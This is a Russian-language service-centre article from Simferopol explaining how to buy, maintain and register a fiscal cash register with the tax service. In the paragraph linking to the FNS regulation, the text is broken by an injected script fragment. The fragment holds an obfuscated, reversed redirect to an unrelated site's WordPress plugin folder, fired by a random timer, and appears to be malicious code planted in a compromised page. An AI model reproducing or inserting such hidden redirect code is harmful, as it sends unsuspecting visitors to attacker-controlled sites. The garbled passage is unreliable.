Как зарегистрировать кассовый аппарат

Если для приема наличных средств от клиентов Вашему предприятию по законам России требуется использовать фискальный кассовый аппарат, то Вам требуется приобрести и зарегистрировать контрольно-кассовую машину с ЭКЛЗ. Если Вы являетесь плательщиком ЕНВД и не хотите вручную заполнять бланки строгой отчетности (БСО) при приеме наличности, то Вам требуется ЧПМ или АСПД (аналоги кассового аппарата и фискального регистратора, но без ЭКЛЗ, не требующие регистрации в ФНС)

Краткий план мероприятий по регистрации кассовой техники.

Чтобы обзавестись кассовым аппаратом Вам требуется:
1) принять решение о покупке аппарата;
2) выбрать модель аппарата, в чем Вам помогут наши консультанты или статья об отличиях между разными кассовыми аппаратами;
3) оплатить счет на товар и услуги в нашей кассе или по б/н;
4) предоставить нам информацию — копии/сканы/оригиналы уставных документов (список);
5) присутствовать в ФНС при вводе в эксплуатацию/поручить это своим сотрудникам/доверить нам;
6) забрать аппарат и документы у нас/из ФНС, начать работать (обучение кассира входит в стоимость аппарата).

Процесс приобретения, регистрации и ввода в эксплуатацию кассовой техники

Итак, Вы определились с типом кассовой техники и конкретной моделью. Если у Вас остались сомнения — проконсультируйтесь с нашими сотрудниками любым удобным Вам способом. Теперь оборудование нужно приобрести, оплатив выставленный Вам счет через банк или в кассе нашего предприятия. Обычно в него сразу включаются журналы кассира-операциониста КМ-4 и учета вызовов технических специалистов КМ-8.

Кассовая техника в РФ должна находиться на техническом обслуживании в центре технического обслуживания. Приобретение техники и заключение договора на техническую поддержку напрямую не связаны и ничто не мешает приобрести кассовый аппарат в одной фирме, а договор на техническую поддержку заключить с другим ЦТО, хотя некоторые ЦТО пытаются ограничить выбор потребителя навязывая услуги по освидетельствованию исправности и соответствия документации техники, которая приобретается в других местах. Наши же техники просто оперативно проверяют, что вся документация на ККТ присутствует, а аппарат исправен.

Стоимость технической поддержки в нашем ЦТО — от 1500 до 2250 рублей в квартал за каждую единицу ККТ. Стоимость зависит от типа оборудования и места его расположения. Основные составляющие услуги по технической поддержке:
— консультации по телефону с техником по обслуживанию в случае возникновения нестандартных ситуаций в работе ККТ, устранение сбоев по телефону под диктовку техника или диагностирование неустранимой на месте неисправности после которой принимается решение о доставке ККМ в сервисный центр или о выезде инженера на место установки аппарата;
— ежеквартальное посещение техником места установки ККТ с выполнением следующих операций: внешний осмотр, тестирование работоспособности блоков и узлов ККМ, проверка полноты и правильности отображения обязательных реквизитов на чеке, чистка и смазка механических узлов (при определенной техником необходимости в этом), проверка версии установленного программного обеспечения, установка средств визуального контроля (голограмм, знаков, марок-пломб) в определенных законом случаях, пломбировка корпуса ККМ (если он вскрывался в процессе ТО), заполнение документации (журнала км-8, паспорта ККТ, прочих документов, если это требуется);
— поддержка гарантийных обязательств завода-изготовителя;
— выполнение работ по ремонту ККТ без дополнительной оплаты, оплачивается только стоимость запчастей в случае их замены (естественно, в гарантийный период вышедшие из строя не из-за нарушения условий эксплуатации детали меняются за счет производителя).

Регистрация ККТ в Федеральной налоговой службе проводится после заключения договора о технической поддержке с ЦТО. Согласно нормам законодательства РФ фискализация кассового аппарата, активизация ЭКЛЗ и опломбирование осуществляет техник ЦТО в специальном помещении в ФНС в присутствии сотрудника ФНС и представителя предприятия-пользователя ККТ (или индивидуального предпринимателя). Подробно изучить особенности процесса можно, скачав Регламент с toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}docs/3974982/»>сайта ФНС. Однако, процесс ввода в эксплуатации лишь завершается этим этапом. Сначала требуется подготовить пакет необходимых документов, поставить на них подписи, печати ЦТО и предприятия-пользователя (или ИП).

Для регистрации Вашей контрольно-кассовой техники в ФНС нам потребуются следующая информация:

1) Свидетельство о постановке на учет.
2) Свидетельство о государственной регистрации.
3) Лист записи/выписка из ЕГРЮЛ (с кодом ОКВЭД основного вида деятельности).
4) Банковские реквизиты, если есть расчетный счет.
5) Точный (с индексом) адрес установки аппарата и наименование торговой точки (кафе/магазин/СТО/офис и т.д.).
6) Копия паспорта руководителя/ИП.
7) Если помещение, где будет стоять аппарат, в аренде, то договор аренды.
8) Если документы в ФНС будут подаваться не лично индивидуальным предпринимателем , то — нотариально заверенная доверенность на представление интересов в органах государственной власти.
Для юрлиц:
9) Если адрес установки аппарата не совпадает с юридическим адресом — уведомление о регистрации обособленного подразделения .
10) Копия паспорта сотрудника, который будет подавать заявление в ФНС (если заявление подается предприятием-пользователем самостоятельно).
11) Копия документа, подтверждающего полномочия руководителя (приказ о назначении, протокол собрания учредителей и т.д.).

Заверение копий не требуется. Вы можете принести ксерокопии, прислать отсканированные документы по электронной почте (либо дать их скопировать с Вашей флешки) или принести оригиналы документов, с которых мы снимем копии. Чтобы нашим клиентам не приходилось вникать в тонкости подготовки каких-либо документов для регистрации аппарата, наши сотрудники на основании предоставленной информации готовят все необходимое. Пользователю ККТ остается лишь подставить подписи и печати в указанных местах на документах.

Обычно это происходит у нас в офисе, но если клиент живет в другом городе и регистрации будет происходить в налоговой того же города (или другого, но не Симферополя), то возможна следующая схема работы. Клиент выбирает кассовый аппарат с помощью сайта или после телефонной консультации с менеджером. По электронной почте ему отсылаются счета, они оплачиваются по безналичному расчету. Обратным письмом клиент присылает сканкопии своих документов из списка выше. Мы готовим документы, инженер созванивается с клиентом, договаривается о времени регистрации. Впервые представители пользователя ККТ и ЦТО встречаются в налоговой, представитель ставит подписи и печати.

После подписания документов представитель пользователя и инженер ЦТО подают документы в отделение ФНС (по месту прописки ИП / регистрации предприятия или его обособленного подразделения). Инспектор выдает фискальный номер, который вносится в ККМ. ЭКЛЗ активируется, корпус ККМ пломбируется, наклеивается средство визуального контроля голограмма «Сервисное обслуживание», которая до конца года будет удостоверять наличие договора с ЦТО. Зарегистрированный кассовый аппарат забирается пользователем, после чего ККМ можно начинать пользоваться (записывая данные отчетов чтобы внести их потом в книгу кассира), хотя лучше законность этой возможности уточнять у инспектора, так как разные подразделения ФМА смотрят на вопрос начала работы до полного завершения регистрации по-разному. Через несколько рабочих дней (по регламенту, не более пяти) по телефону, указанному в заявлении на регистрацию, позвонят из ФНС и пригласят забрать документы: журналы КМ-4 и КМ-8, карточка регистрации, паспорт ККТ. Забрать документы обычно должен человек, подававший заявление. О получении документов он расписывается в журнале выдачи документов в ФНС.

На этом процесс регистрации полностью заканчивается, на аппарате, точно, можно работать, вести кассовую книгу. В стоимость покупки кассового аппарата входит обучение кассира, который может прийти в любой вторник или среду в наш офис до 9:30 часов и в течение часа-полутора обучиться работе на кнопочном аппарате и ведению журнала кассира-операциониста, либо только ведению журнала, если работать предстоит на ПТК, управление которым осуществляется через компьютер.

г.Симферополь. 22.08.2015г. Автор: Сальцын Кирилл.
square-stand